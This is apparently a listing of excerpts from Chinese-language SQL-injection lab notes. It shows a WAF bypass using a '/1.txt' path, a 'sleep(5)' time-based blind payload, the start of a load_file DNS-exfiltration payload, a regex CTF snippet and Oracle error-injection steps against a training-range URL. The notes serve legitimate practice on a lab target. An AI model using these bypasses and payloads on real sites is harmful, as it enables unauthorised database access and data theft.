天英 dns 注入笔记
1先来?id=1可以存在注入 ?id=1 and 1=1 有安全狗 安全是建立在信任的基础上的,防火墙默认对图片和文件的传参都是安全的。所有运用/1.txt尝试延时盲注:/1.txt?id=1 and sleep(5) 成功用工具跑,访问频率太高,防火墙可能把你ban掉。2使用DNS注入 这里是调用了一个可以读取文件的函数load_file;load_file(concat(&
正则表达式靶场
<?php $key='flag{********************************}'; $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"]), $ma
天英 5.4.1、Oracle注入- 报错注入 解题笔记
1栏中输入?id=1开题,浏览器有反应说明可以SQL注入 http://o1.lab.aqlab.cn:81/?id=1猜字段数 单引号先闭合 后面会干扰--注释掉 没报错 说明有单引号 后面的单引号注释掉了 ('')2 http://o1.lab.aqlab.cn:81/?id=1%27order%20by%201--order by 1没有报错
1